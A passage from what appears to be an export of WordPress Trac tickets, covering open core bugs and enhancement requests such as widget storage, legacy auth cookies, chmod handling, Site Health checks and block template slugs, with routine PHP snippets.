limit. What's more is that widget options get registered as autoloaded, so all widget options will get combined together in the `alloptions` key, making widgets even more liable to overrun the 1MB cache bucket limit in Memcached. '''Concurrency:''' Since all widget instances of a given type are stored in a single option, if two users attempt to update two separate widgets at the same time, it is possible that one of the updates will get lost (see #31245). Additionally, the widgets admin page and widgets in the Customizer both get loaded with the max number (array index) for each widget type. When a new widget instance is created, this maximum number is incremented in memory and used in the new widget ID which is then passed to the server for saving. If two users have loaded the UI at the same time, when they both create a widget of a given type and save their widget changes, the one who saves last will overwrite the other user's widget since the two widgets would have the same ID. (See #32183 for more about the widget ID collisions, and see [https://wordpress.org/plugins/customize-widgets-plus/ Customize Widgets Plus] for a “Widget Number Incrementing” component which uses Ajax to generate new widget IDs in a more concurrency-safe manner.) '''Addressability:''' As noted above, widget instance IDs are comprised of the widget type's `id_base` followed by the array index `number`. Two different widget instances can have the same `number`, such as `search-3` and `text-3`, since the `number` is incremented in the scope of the instances of the given type. No other objects in WordPress are identified by strings in this way, that is as of now: taxonomy terms actually used to have to be addressed by a numeric term ID and taxonomy name until term splitting happened in 4.2 (see #5809). Now, however, a term can be uniquely identified by a single integer ID. All of the above issues would be resolved by switching to store widget instances in a custom post type, where each widget instance has a single unique auto-incremented post ID. == Advantages Storing widgets in custom post type has several benefits beyond fixing the above issues, including: * widget authorship attribution * revision history * import/export * querying * widget drafts * scheduled widgets == Data Migration Migrating widgets from options to a custom post type would involve some tedious data migration to update all references to current `id_base-number` widget IDs to their new integer IDs. The old widget ID could actually be copied directly into the `post_name` field for the `widget_instance` posts. Backwards compatibility for the `sidebars_widgets` option containing the old-style IDs may be necessary. Newly created widget IDs could have `post_name` fields populated with the `id_base` followed by the post ID. This switch would also necessitate discontinuing to register all widget instances with every request (#23909). == Sidebars and Widget Groups Perhaps out of scope for this ticket, but the way that widgets get associated with sidebars should also perhaps be changed to follow the pattern of how nav menu items are associated with a nav menu via a taxonomy term. The implementing of widget groups (#19912) could be the right opportunity to do this, where a `widget_grouping` taxonomy could be introduced, and when a grouping is assigned to a sidebar, the backwards-compatible widget IDs could be copied into the existing `sidebars_widgets` option. Otherwise, backwards compatibility might entail adding `pre_option_sidebars_widgets` filter. == REST API Impacts For more on widgets and now they relate to nav menu items in the context of a harmonized interface via the REST API, see https://github.com/WP-API/wp-api-menus-widgets-endpoints/issues/10 == Feature Plugin See the [https://github.com/xwp/wp-customize-widgets-plus Customize Widgets Plus] feature plugin's “Widget Posts” module for an initial implementation of storing widgets in a `widget_instance` custom post type. This plugin depends on #32474 which facilitated plugins to store widgets in posts instead of options." westonruter Future Releases 50522 "stop setting ""older"" cookies with multiple path prefixes" Login and Registration 5.4.2 normal normal Future Release defect (bug) new changes-requested 2020-07-01T13:38:23Z 2024-02-01T20:47:17Z "According to `wp_clear_auth_cookie()`, {{{#!php <?php // Auth cookies. setcookie( AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH, COOKIE_DOMAIN ); setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH, COOKIE_DOMAIN ); setcookie( AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN ); setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN ); setcookie( LOGGED_IN_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN ); setcookie( LOGGED_IN_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN ); // Settings cookies. setcookie( 'wp-settings-' . get_current_user_id(), ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH ); setcookie( 'wp-settings-time-' . get_current_user_id(), ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH ); // Old cookies. setcookie( AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN ); setcookie( AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN ); setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN ); setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN ); // Even older cookies. setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN ); setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN ); setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN ); setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN ); // Post password cookie. setcookie( 'wp-postpass_' . COOKIEHASH, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH, COOKIE_DOMAIN ); }}} Which usually means **19 cookies for a login**. This itself may represent up to **2.4 kB of header size** for that sole purpose. (Let's remind that many reverse-proxy has arbitrary limitation. Eg: HTTP2 push on Cloudflare at 3kB) An obvious first question is why decade-old cookies are still set instead of the minimal 11 cookies. We can also observe that in most configurations, **COOKIEPATH = /**, ADMIN_COOKIE_PATH and SITECOOKIEPATH are either equal or a s**ubpath of COOKIEPAT**H. As a consequence, these additional granular-path cookies are useless because the cookie is already set for the whole domain. This could further remove 2 or 3 cookies. Couldn't this be number of cookies halved?" drzraf Future Releases 46991 Stop propagation on actions or filter Plugins low normal Awaiting Review feature request new dev-feedback 2019-04-19T12:05:17Z 2020-11-19T12:02:38Z "It would be great to stop further filter-hooks/action-observer when we reached a state that should not continue. This helps especially for custom implementations: * Rejection actions that should not run. * Return filtered values without giving other plugins the chance to change them. All just for specific cases. Possible implementation: * Normal but impossible: Event-Class as wrapper reflecting whether to continue or stop. * Semi-normal-way: Throwing a exception like `\WP_Stop_Propagation_Exception` telling WP_Hook to stop. * Absolute absurd way: Setting a global variable like `$stop_propagation = true` ... and there may be more." screamingdev Future Releases 40088 Stop creating the `wp_links` database table Database 3.5 normal normal Future Release defect (bug) new close 2017-03-09T20:29:37Z 2022-08-10T19:19:35Z "In WordPress 3.5 (2012) the Links feature was disabled by default in new WordPress installations, and was hidden for old installations that had no links. See #21307. Every new WordPress site since then (including multisite) has continued to create an empty `wp_links` database table for a feature that was sunsetted 5 years ago." johnjamesjacoby Future Releases 51340 Stop chmodding files and folders Filesystem API 5.3 normal major Awaiting Review defect (bug) new dev-feedback 2020-09-18T08:38:34Z 2024-02-02T12:07:42Z "WP's filesystem handler has a chmod function, that is used e.g. when updating,... To conform with standards, enforce proper usage of umask by the server admin as well as avoid errors when the file owner is not the same as the user running WP, WP should not be chmodding files whatsoever. Linux, for obvious security reasons, only allows chmod for the owner of the file (independent of permissions, except root). Thus, it makes sense to have the WP files owned by user A, but run php(-fpm) by user B. When WP now tries to chmod, which it shouldnt, as we have established that may cause a security issue, it will obviously create a PHP error." malthert Future Releases 42085 Still getting ini_get_all warning message Bootstrap/Load normal normal Future Release defect (bug) new dev-feedback 2017-10-04T13:18:36Z 2017-10-04T22:44:05Z "For some PHP configurations, the check function_exists does not suffice. {{{ Warning: ini_get_all() has been disabled for security reasons in /home/mysite/public_html/wp-includes/load.php on line 1027 }}} Suggested fix in wp_is_ini_value_changeable() {{{ if ( ! isset( $ini_all ) ) { $ini_all = false; // Sometimes `ini_get_all()` is disabled via the `disable_functions` option for ""security purposes"". if ( function_exists( 'ini_get_all' ) ) { $disabled_functions_raw = explode( ',', ini_get( 'disable_functions' ) ); $disabled_functions = array_map( 'trim', $disabled_functions_raw ); if (!array_search( 'ini_get_all', $disabled_functions ) ) { $ini_all = ini_get_all(); } } } }}}" scottcwilson Future Releases 48962 Start using namespaces in Core General normal normal Awaiting Review enhancement new dev-feedback 2019-12-13T09:39:16Z 2019-12-13T13:04:19Z "After moving WordPress minimum PHP version to 5.6 with plans for 7.x there was a big reason to upgrade core to modern PHP-development approaches. The biggest advantage of namespaces is autoloading. Nowadays many plugin developers using Composer or their own autoloaders in every plugin. Some part of developers just ""include(_once)"" everything. And Composer is more preferable solution. But it is a big problem. Many plugins are using their local directory autoloader/composer. And that can be easily solved by using Composer in WordPress distibution. Composer can simplify work with dependecies and plugin updates or even WordPress updates. I don't think that WordPress need own autoloader when in PHP-world exists de-facto standard in face of Composer. But it is just my personal opinion. There are no extraordinary problems to upgrade code to namespace basis. It can be done by some script. To avoid BC changes we need just use \class_alias() for namespaced classes to make copy in global namespace. Old class-files can be marked as deprecated. " taraschr Future Releases 49515 SSL requirement during installation with SQL command through admin if mixed content Upgrade/Install normal normal Awaiting Review feature request new dev-feedback 2020-02-26T14:08:12Z 2021-05-11T07:07:35Z "Would it not be a good idea to highlight / warn the user if they try to use http instead of https? Furthermore, it would be very beneficial if wp admin offered a solution in terms of a SQL command for fixing mixed content if SSL is added after the fact. This might already be in the pipeline?" bjornenio Future Releases 38750 Split wp_signups into wp_user_signups and wp_blog_signups Login and Registration 3.0 normal normal Awaiting Review feature request new needs-unit-tests 2016-11-10T19:07:00Z 2019-05-26T19:10:11Z "Right now, `wp_signups` (and the entire related API) does double-duty. It's 1 database table that's used for both users & blogs, but there are a few issues with this approach: * Open sign-ups may or may not include ability to create sites * There is no UI for managing sign-ups in WordPress core * Sign-ups are different between singlesite & multi-site * Plugins like BuddyPress do their best to include and/or work-around WordPress's core functionality, but end up writing a ton of additional code to manage this * Other membership plugins are forced to roll their own approach every single time * It's possible for multisite sign-up race conditions to exist, with users & sites created or activated from underneath each other (documented in `wpmu_activate_signup()`) I'm adding the multisite focus to this issue, because all of the current code is only relevant to multisite, but I'd like to see single-site inherit whatever future approach we can come up with. The core sign-ups code, stinks. Yet open registration is part of what makes WordPress & community/membership sites great. I think it would be great to take what we've learned from BuddyPress, WordPress.org, WordPress.com, and the bevy of Membership plugins, and make a great sign-up component/API for WordPress core." johnjamesjacoby Future Releases 57211 Split up `WP_Query::get_posts()` costdev Query normal normal Future Release enhancement assigned dev-feedback 2022-11-26T15:37:55Z 2023-01-23T07:15:50Z "[https://developer.wordpress.org/reference/classes/wp_query/get_posts/#source WP_Query::get_posts()] is a huge method at ~1650 lines. This makes it quite hard to follow and maintain. By splitting it up: - It's easier to follow. - It's easier to maintain. - It's easier to write tests. - Our scroll wheels will last a little longer. As this is possibly the most critical method in Core, the aim of this ticket is not to refactor the logic, but just to abstract functionality. Changes to logic and such could be done later, in more maintainable code. This should significantly reduce the chance of introducing regressions, and hopefully mean that committing such a change can be done in the near future. All new methods should have `private` visibility." costdev Future Releases 42278 Speed up tests by using shared user fixtures Build/Test Tools normal normal Future Release enhancement new needs-unit-tests 2017-10-19T09:09:44Z 2019-01-08T10:13:51Z "There are a lot of tests that require user fixtures. These are then created, and afterwards deleted, as part of the test class set up and tear down methods. These fixtures could all be reused between tests, if a user for every role in Core would be created in the database as part of the unit test setup process. If we had that, all the tests that need for example a user with the `editor` role could just grab the existing user from the database, instead of creating this as a test fixture." Frank Klein Future Releases 58180 Specify the REGEXP format for meta_query Database 6.2 normal trivial Awaiting Review enhancement new needs-docs 2023-04-24T05:47:20Z 2023-08-01T11:33:44Z "Because of the fact that `meta_query` parameter with `['compare' => 'REGEXP', 'key' => 'foo', 'value' => '^bar']` working as substitution to raw SQL-request like `... foo.meta_key REGEXP ^bar ...` please, specify this explicitly in the [https://developer.wordpress.org/reference/classes/wp_meta_query/ documentation] - especially the fact that this REGEXP should not be wrapped in `/`" letraceursnork Future Releases 52871 "Space added after the ""option"" tag on the options-writing.php file" Administration normal normal Awaiting Review enhancement new close 2021-03-20T13:00:07Z 2023-05-29T15:44:27Z "Space added after the ""option"" tag on the options-writing.php file as a standard workflow." Laxman Prajapati Future Releases 24879 Sourcemaps should be provided for use with minified javascript libraries Build/Test Tools normal normal Future Release enhancement new dev-feedback 2013-07-29T15:49:33Z 2017-02-19T10:42:42Z "Sourcemaps make it possible to debug minified files. Supported in Chrome: https://developers.google.com/chrome-developer-tools/docs/javascript-debugging#source-maps Landing in Firefox in v23: https://wiki.mozilla.org/DevTools/Features/SourceMap When this feature is enabled, the Chrome console currently shows a 404 when the script specifies a sourcemap file and it isn't found." jblz Future Releases 15861 Sorting users by post count Users normal normal defect (bug) new dev-feedback 2010-12-17T10:21:24Z 2019-06-05T06:37:48Z "Currently, to enable sorting by post count, there's a JOIN made between the users table and the posts table. This is bad, because users is a global table, which might be stored in a separate database. Short-term solution for 3.1 is to disable sorting. Long-term solution is to avoid the JOIN somehow. " scribu Future Releases 11740 Sorting tags and towns does not work well for utf-8 nbachiyski I18N 2.9 normal normal Awaiting Review defect (bug) new dev-feedback 2010-01-06T12:42:24Z 2024-02-28T16:41:53Z "There are problems with sorting special Czech characters: 1) Options - General - Timezone selection. Evropa (Europe) First item should be Amsterdam, but instead of it there is ""Řím"" (Rome in Czech). And this is not right, character Ř should be between R and S. 2) Editing posts - Select from most used tags. You can create tags ""Rome"", ""Amsterdam"" and ""Řím"". Tags are also sorted in a bad way, first is ""Řím"". It is very problematic for Czech users when there are many tags, because it does not help them..." pavelevap Future Releases 57825 Something's wrong with the way the 'admin_init' hook and/or the wp_update_post function works General 6.1.1 normal normal Awaiting Review defect (bug) new dev-feedback 2023-02-28T19:54:51Z 2023-02-28T19:54:51Z "Hi, (I'm not sure what's happening here, so I left the Component dropdown with its default value.) The issue in a nutshell: when hooked to `admin_init`, the below function's wp_update_post() call is executed even when the wrapper if-else statement evaluates to false, and it updates all `mac-submenus` post type entries' status to 'draft' regardless of the fact that the `$post_id` variable doesn't even have a value in this case. I don't know how is this even possible, but it's happening - and if another admin hook is used ( for instance `in_admin_header` ), the function works perfectly, just as expected. {{{#!php <?php function cpt_mac_submenus_create_delete_check_menu_items() { // Get all submenu posts $spq_Arr = array( 'posts_per_page' => -1, 'post_type' => 'mac-submenus', // We only check published submenu posts 'post_status' => array('publish'), 'fields' => 'ids', ); $submenu_post_ids_Arr = get_posts( $spq_Arr ); // Get the custom item array of the menu associated with the 'primary_menu' location global $new_menu_Arr; // Get all menu items that are top-level and parent $parent_menu_items_Arr = mac_helper_search( $new_menu_Arr, 'has_children', true ); $top_level_menu_items_Arr = mac_helper_search( $new_menu_Arr, 'is_top_level', true ); $tlp_items_Arr = array_uintersect( $parent_menu_items_Arr, $top_level_menu_items_Arr, function( $val1, $val2 ) { return strcmp($val1['has_children'], $val2['has_children']); } ); // Check if all 'mac-submenus' entries have their respective top-level & parent menu // item in the menu associated with the 'primary_menu' location. // // If a submenu entry DOESN'T have such corresponding menu item: // - check if it has a top-level BUT NOT PARENT corresponding menu item // - if it has, change the submenu post status to 'draft' // -------------------------------------------------------------------------------------------- // 1. Get submenu posts having a corresponding top-level parent menu item. $posts_with_tlp_Arr = array(); foreach ( $submenu_post_ids_Arr as $post_id ) : $post_has_tlp = false; foreach ( $tlp_items_Arr as $menu_item ) : $mi_title = html_entity_decode( $menu_item['title'] ); $p_title = html_entity_decode( get_the_title( $post_id ) ); if ( $mi_title == $p_title ) : $post_has_tlp = true; break; endif; endforeach; if ( $post_has_tlp ) $posts_with_tlp_Arr[] = $post_id; endforeach; // 2. Get posts that don't have a corresponding top-level parent menu item, and // change their status to 'draft'; $posts_with_no_tlp_Arr = array_diff( $submenu_post_ids_Arr, $posts_with_tlp_Arr ); if ( !empty($posts_with_no_tlp_Arr) ) : foreach( $posts_with_no_tlp_Arr as $post_id ) : $update_args_Arr = array( 'ID' => $post_id, 'post_type' => 'mac-submenus', 'post_status' => 'draft', ); wp_update_post( $update_args_Arr ); endforeach; endif; } add_action( 'admin_init', 'cpt_mac_submenus_create_delete_check_menu_items' ); }}} I spent an hour with testing code variations, but couldn't find a problem with the above code or a fix of the issue." lunule Future Releases 48078 Some WP_XXX_Query::query() methods produce incorrect results when called in a loop Query normal normal Awaiting Review defect (bug) new dev-feedback 2019-09-19T18:28:19Z 2019-09-20T11:47:58Z "While testing a [https://core.trac.wordpress.org/attachment/ticket/37392/37392.9.patch patch] for #37392 I came across what ''may'' be a bug in `WP_Site_Query::query()`. That patch creates a `WP_Site_Query` object and then in a loop does various different `query()`'s, as in: {{{#!php $q = new WP_Site_Query(); $args = array( 'network_id' => $network_id, 'number' => 1, 'fields' => 'ids', 'no_found_rows' => false, ); foreach ( array( 'public', 'archived', ... ) as $status ) { $_args = $args; $_args[ $status ] = 1; $q->query( $_args ); // do something with the results of this site query. } }}} However, calling `query()` in a loop like that doesn't produce the expected results other than the 1st time through the loop. Why? Because when `query()` calls `WP_Site_Query::get_site_ids()` on subsequent iterations, the protected class member `$sql_clauses` still has its value from the previous iteration through the loop and the ""new"" query basically gets added to the previous queries. In the case of the above code this results in the query for `archive = 1` to actually be `public = 1 AND archive = 1` which is **not** what is intended. Looking at other `WP_XXX_Query()` classes, I ''think'' the following suffer from the same thing (although I haven't written code to test that): 1. `WP_Network_Query` 2. `WP_Term_Query` but the following do **not**: 1. `WP_Query` (because it doesn't use a class member for the clauses) 2. `WP_User_Query` (because it uses a `prepare_query( $query )` method which resets the class member(s)) So, I guess the question is: should these `query()` methods be expected to work when called multiple times in a loop (with different queries each time) or is that **not** an intended use?" pbiron Future Releases 17619 Soft 404 at /wp-content/plugins/ General normal normal Future Release enhancement new dev-feedback 2011-05-30T16:31:30Z 2019-09-24T19:39:34Z "/wp-content/plugins/index.php would be better written with a proper 404. {{{ <?php header('HTTP/1.0 404 Not Found'); // Silence is golden. ?> }}}" miqrogroove Future Releases 48331 Snoozing the admin email verification screen when a user initiates/confirms a site email change Site Health normal normal Awaiting Review enhancement new dev-feedback 2019-10-16T19:45:01Z 2019-12-06T14:21:48Z "When presented with the admin email verification screen, clicking update takes you to the `Settings > General` page where the user can update the email address. But, even if the user initiates an admin email address change (which requires a confirmation URL in an email to be clicked), they will continue to see the verification screen until they click to confirm the email is correct or ""Remind me later"", even if the email change request is confirmed. When a user navigates to the Settings > General page from clicking Update on the verification screen and follows through to initiate a request to change the admin email, the verification screen should be snoozed the same as clicking ""Remind me later"". Being consistently presented with the verification screen could cause the user to confirm the email just to get the notice to stop. When a request to change the email is confirmed, both the old and new email receive a notification informing them of the action. The verification screen could probably be snoozed same amount of time as `admin_email_check_interval` at that point." desrosj Future Releases 39636 Smilies not converted when directly followed by punctuation marks Formatting 4.7.1 normal normal Future Release enhancement new dev-feedback 2017-01-19T10:29:30Z 2022-04-11T03:02:17Z "Steps to recreate: - Create a new post or comment - Insert a smilie directly followed by a period or other punctuation mark such as :). - View the post or comment Expected: Ideally the smilie would show followed by the punctuation mark. I've attached a screenshot showing how a post with the following text appears. Smiles with a space between them and the punctuation mark show, but the others do not. {{{ This is a test :). It uses smilies :) If a smilie has punctuation directly after, it is not converted :(! :( The expected behavior would be to look like this: :) ! :) , However instead they appear as this :)! :), }}} " ourvalley Future Releases 54211 Small css bug when using customize-controls in customizer.php Customize 3.4 normal minor Awaiting Review defect (bug) new dev-feedback 2021-10-02T11:21:51Z 2022-09-09T10:34:04Z The form code is wrong in the css for some elements. To reproduce problem, add in customizer.php custom two customize-control-radio and two customize-control-select. You see the 'radio' has extra 10px padding on bottom. The 'select' is missing the 10px padding. So it looks very bad when you organize the elements. So either remove the 10px or add the 10px to the 'select' css. akissz Future Releases 57438 Slug is not generated when saving posts as draft Posts, Post Types normal normal Awaiting Review defect (bug) new dev-feedback 2023-01-10T04:28:22Z 2023-03-08T16:39:30Z "When saving posts as draft, the slug is empty. Only when publishing posts, the slug is generated. Slug should be auto-generated even when saving posts as draft. Steps to reproduce: - Add a new post (in the classic editor or Gutenberg) - Enter the post title - Save the post as draft - Reload the page (if in Gutenberg) and see the slug is empty" rilwis Future Releases 58132 Slashes used in block templates slug is a problem on Windows Editor 5.9 normal normal 6.6 defect (bug) new dev-feedback 2023-04-14T11:26:33Z 2024-02-29T21:46:03Z "Generally, they are all stored flat in the theme `templates` or `block-templates` folder; we have no problem here. But when they are stored deep under some folder/s, the slug checks won't pass on Windows. This is because finding the template paths [https://developer.wordpress.org/reference/functions/_get_block_templates_paths] return backslashes `\` and [https://core.trac.wordpress.org/browser/tags/6.2/src/wp-includes/block-template-utils.php#L313] currently only does `substr` extracts to come up with a slug that is passed to [https://developer.wordpress.org/reference/functions/_build_block_template_result_from_file/], which eventually fails line [https://core.trac.wordpress.org/browser/tags/6.2/src/wp-includes/block-template-utils.php#L981] as the slugs in the query are using forward slashes `\`." gaft Future Releases 57964 Sitehealth recommended improvements - utf8mb4 requires a newer client library Site Health normal normal Awaiting Review enhancement new dev-feedback 2023-03-21T17:01:37Z 2023-03-23T08:34:22Z "WordPress: 6.2-RC2 Sitehealth recommended improvements - utf8mb4 requires a newer client library UTF8MB4 is the character set WordPress prefers for database storage because it safely supports the widest set of characters and encodings, including Emoji, enabling better support for non-English languages. Your MariaDB version supports utf8mb4. WordPress’ utf8mb4 support requires MySQL client library (libmysql) version 5.5.3 or newer. Please contact your server administrator. {{{ from phpinfo.php mysqli Client API library version 3.1.20 Client API header version 10.4.28-MariaDB mysqlnd Version mysqlnd 8.1.16 In WordPress site health info: Extension mysqli Server version 10.4.28-MariaDB Client version 10.4.28-MariaDB }}} https://php.watch/versions/8.2/mysqli-libmysql-no-longer-supported With PHP 8.2 should this recommended be given as libmysql no longer supported in PHP 8.2. Does any version of mysqlnd support utf8mb4 instead and should be the recommendation instead? Note: Running PHP 8.1 on production site and my local PHP 8.2 doesn't use libmysql if this is already fixed. " ipajen Future Releases 43598 site-options notoption only queried and never set in not multisite wordpress installs SergeyBiryukov Options, Meta APIs 4.9.5 normal normal Future Release enhancement reviewing dev-feedback 2018-03-21T10:08:34Z 2019-09-23T23:15:04Z "We have notoptions mechanism that works well. WordPress core does also query $network_id:notoptions regardless of multiste. However, such option is set only in multisite installs. As a result, if you are not running multisite, you are only querying for $network_id:notoptions and you never set it. It beats the idea of notoptions - we read it, but we never set it - what's the point? Possible solutions: - read $network_id:notoptions only in multisite installs - set $network_id:notoptions also in not multisite installs" Grzegorz.Janoszka Future Releases 35182 Site icon URLs don't respect SSL in admin Administration 4.4 normal normal defect (bug) new dev-feedback 2015-12-21T12:14:56Z 2019-06-04T19:33:29Z "It appears that the following check in `wp_get_attachment_url()`: {{{#!php if ( is_ssl() && ! is_admin() && 'wp-login.php' !== $GLOBALS['pagenow'] ) { $url = set_url_scheme( $url ); } }}} prevents `get_site_icon_url()` from using SSL for serving the icon links in the head, which results in non-HTTPS icon URLs on all admin pages: [[Image(http://kaspars.net/wp-content/uploads/2015/12/site-icon-url-https.png)]] " kasparsd Future Releases 56987 Site Health: add visual placeholder for checks that are still loading Site Health normal normal Awaiting Review enhancement new dev-feedback 2022-11-03T16:26:43Z 2023-10-23T18:41:50Z "I love the Site Health feature, and I think it can improved in a few small ways to potentially impact user experience in one big way 💙 Right now, there is some helpful text that says ""Results are still loading"" and – when at least 1 recommendation can be made – another piece of text becomes a counter for the increasing number of possible Site improvements. This is great to have, but in my experience, the longer running in-progress checks are easily overlooked because there is not a big obvious visual indicator that background processing is happening. It wasn't until I started writing this description and looking for clues, that I zoomed in to see that the thin grey circle next to the top text (id: `#site-health-progress`) has animation connected to it. (I recall this previously had a percentage; I think it's OK that number is omitted.) When a recommendation finishes, it appears in either the top list for ""recommended improvements"" or the bottom list for ""items with no issues detected"". This is where I have ideas for UX tweaks: * ""items with no issues detected"" is hidden by default behind a button shaped toggle, so users are never presented with what work is being done * ""items with no issues detected"" toggle state is not persistent between page refreshes (using a screen option) so curious users cannot opt-in to seeing progress * longer running checks give the impression that checks have completed or the page may be stuck ---- In my imagination, a few things should happen in conjunction: * Add visual placeholders for in-progress checks * perhaps as its own separate list with an item for each one, with a spinner where the open/close toggle is * maybe some new creative UI if there is visual noise from elements jumping around * ""items with no issues detected"" should be open by default * when the user toggles it closed, it should stay closed until opened, etc.. * ""Screen Options"" could be added to use an existing API (or something more Gutenbergy?) * More explicit and intentional verbiage - are these checks, items, issues, recommendations, improvements, or tests? * Fewer words to give users less to read * Narrow the scope of these adjectives into a familiar Type/State/Status pattern? * More precise counts & labels: * Simple: `All (24) | Pending (2) | Running (5) | Finished (17)` * Wordy: `All (24) | Needs Attention (2) | In Progress (5) | Satisfactory (17)` * Checks should be dismissible so users can hide ones they are comfortable with * Screen Options to the rescue again! * Add ""Dismissed (1)"" to the above counts * Save state of checks in a transient, run as cron every 24 hours * Add some text about ""checks running periodically"" * Allow this to be disabled with filters and/or multisite installs * Debounce for some number of seconds so navigating between ""Status"" and ""Info"" does not always rerun every check * Show a (2) count bubble in the admin menu * Send an email when new recommendations are discovered * Add some ""Rerun"" or ""Check Now"" button to flush the transient & run the job ---- I think these iterations change Site Health from being the very useful tool that it currently is (when discovered organically) to an interface that feels trustworthy and remarkable enough for users to feel compelled to take action on, and plugins & WordPress core to pull users into when issues come up." johnjamesjacoby Future Releases 46967 Site health, info tab: show the current uploads directory info on network installs Site Health 5.2 normal normal Future Release defect (bug) new dev-feedback 2019-04-18T00:21:04Z 2019-06-20T14:44:58Z "Follow-up from #46954. Most of the information shown in the ""Directories and Sizes"" section doesn't apply for sites on a network install. Useful debug info would be to show the current site's upload directory path, size, and percentage of used space. Other info that may be useful there is the max file size allowed, as set in the network settings." azaozz Future Releases 52471 Site Health Upload-related INI values could use consistent formatting Site Health normal normal Awaiting Review enhancement new close 2021-02-08T16:32:09Z 2021-02-14T19:05:33Z "In #50038, we added a new section to Site Health -> Info section to show upload-related limits. Currently, it does not show the information in a consistent way. It shows values like `128M`, `2G`, and `128 MB`. I would like to suggest to tweak this to use `size_format` function to properly format them. We already use `wp_convert_hr_to_bytes` function to parse INI-style values (`128M`, `2G`, `2M`, etc); they just need some formatting. Despite being a smaller diff, I suppose 5.7 is too early to target this, assuming this gets accepted of course." ayeshrajans Future Releases 47653 Site Health plugin security check Site Health 5.2 normal normal Awaiting Review enhancement new dev-feedback 2019-07-05T04:28:58Z 2021-09-07T17:01:22Z "Having inactive plugins is not necessarily a bad thing. It is if they're up to date, if they haven't had an update in a few months or if they're untested with the current version of WordPress core. Also, when there are outstanding updates and inactive plugins, the main notice (H4, visible while collapsed) should be about the updates, not the inactive plugins." galbaras Future Releases 52343 Site Health Page: Inactive theme message is inconsistent Site Health 5.6 normal normal Awaiting Review defect (bug) new dev-feedback 2021-01-22T07:34:10Z 2021-01-28T18:07:48Z "On the Site Health page, the Theme related messages are confusing. The way theme name is written in different areas is not consistent as well. `File: /wp-admin/includes/class-wp-site-health.php` **Scenario 1 (More than 2 themes available including Twenty Twenty-One):** **Message:** ---- Your site has 1 inactive theme, other than Twenty Twenty-One, the default WordPress theme, and Yardrive, your active theme. We recommend removing any unused themes to enhance your site’s security. ---- From the above message, it is clear that WordPress recommends removing all themes that unused. If someone removes **all** except the active one, Site Health then says: **Your site does not have any default theme.** This is confusing. The initial message should be more self-explanatory, something like: Your site has 1 inactive theme, other than Twenty Twenty-One, the default WordPress theme, and Yardrive, your active theme. We recommend keeping at least one theme to be used as the default along with the active theme and remove the rest to enhance your site's security. Default themes are used by WordPress automatically if anything is wrong with your chosen theme. **Scenario 2: (2 themes without any bundled theme)** **Message:** ---- Your site has 1 inactive theme, other than twentytwentyone, the default WordPress theme, and Yardrive, your active theme. We recommend removing any unused themes to enhance your site's security. ---- Again, this is confusing. It says ""other than twentytwentyone"", when I do not have that theme installed at all! Also, look at how the theme name is written in different cases. In the first case, it says **Twenty Twenty-One**, and for the second one, it becomes **twentytwentyone**. They should be consistent. If there is no twentytwentyone, either remove it from the message or include the exact theme name that is installed instead of twentytwentyone. Twenty Twenty-One is the default theme with WordPress 5.6, which is fine, but at the same time, the theme name should be used in such a way that it does not create any confusion in users' minds. Please note, I am talking about WordPress users, not developers. If someone has any bundled theme like twenty19 or twenty17 installed other than twenty21 as the default theme, either it should not complain about twenty21 or this should be made clear so that general WordPress users know that twenty21 is the default theme for WordPress 5.6 and is recommended to be there as the default theme. If the above makes sense, I would be happy to go ahead and try to build a patch for this. Regards" subrataemfluence Future Releases 55288 Site Editor on 5.9.1 fails to find homepage template for FSE themes, on WP subdirectory installation Editor 5.9.3 normal critical Awaiting Review defect (bug) new dev-feedback 2022-03-01T18:47:29Z 2022-08-11T19:29:10Z "I'm getting an error when launching the site editor on 5.9.1, stating “The editor is unable to find a block template for the homepage”. This happens on both Twenty-Twenty-Two and a custom FSE theme (otherwise functional, has templates/single.html and templates/index.html). **My WP installation is in a subdirectory**, using the [[https://github.com/roots/bedrock|Bedrock]] site structure, so the editor URL is `https://example.test/wp/wp-admin/themes.php?page=gutenberg-edit-site` I've tried it on PHP 7.4.25 and 8.0.14. I've confirmed it still happens with all plugins deactivated. Notably, activating the Gutenberg plugin version 12.6.1 eliminates the error and the editor loads correctly. There are several other reports of the same error in this Twenty-Twenty-Two forum thread: https://wordpress.org/support/topic/the-editor-is-unable-to-find-a-block-template-for-the-homepage/ The error code output from the copy button is {{{ Error: `getHomepageParams`: HTTP status error, 404 at https://example.test/wp/wp-includes/js/dist/edit-site.js?ver=403e01f2b098b6a656118a51787581cb:8766:13 at async getHomepageParams (https://example.test/wp/wp-includes/js/dist/edit-site.js?ver=403e01f2b098b6a656118a51787581cb:8762:20) at async redirectToHomepage (https://example.test/wp/wp-includes/js/dist/edit-site.js?ver=403e01f2b098b6a656118a51787581cb:8797:28) at async reinitializeEditor (https://example.test/wp/wp-includes/js/dist/edit-site.js?ver=403e01f2b098b6a656118a51787581cb:9067:5) }}} " andronocean Future Releases 16833 Signup mechanism shortens usernames without warning Users 3.0 normal normal Future Release defect (bug) new 